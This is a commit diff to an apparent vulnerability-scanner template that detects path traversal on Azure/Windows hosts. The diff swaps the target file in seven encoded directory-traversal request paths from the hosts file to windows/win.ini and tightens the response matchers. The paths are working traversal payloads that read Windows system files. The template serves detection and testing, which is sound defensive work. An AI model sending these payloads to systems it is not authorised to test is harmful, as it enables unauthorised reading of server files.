matcher update

2021-07-31 23:08:46 +05:30 · 2021-07-31 23:08:46 +05:30 · aa336ed979
parent 5d5dafc6e7
commit aa336ed979
1 changed files with 14 additions and 9 deletions
--- a/vulnerabilities/other/azure-path-traversal.yaml
+++ b/vulnerabilities/other/azure-path-traversal.yaml
@ -5,24 +5,29 @@ info:
  author: mesaglio
  severity: high
  description: Detect azure directory traversal hosts file.
+  tags: azure,windows,lfi

 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/system32/drivers/etc/hosts"
-      - "{{BaseURL}}/./../../../../../../../../../../windows/system32/drivers/etc/hosts"
-      - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/system32/drivers/etc/hosts"
-      - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/system32/drivers/etc/hosts"
-      - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/system32/drivers/etc/hosts"
-      - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/system32/drivers/etc/hosts"
-      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/system32/drivers/etc/hosts"
+      - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini"
+      - "{{BaseURL}}/./../../../../../../../../../../windows/win.ini"
+      - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini"
+      - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini"
+      - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini"
+      - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini"
+      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini"

-    matchers-condition: or
+    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
+
      - type: word
        words:
-          - "localhost"
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and
        part: body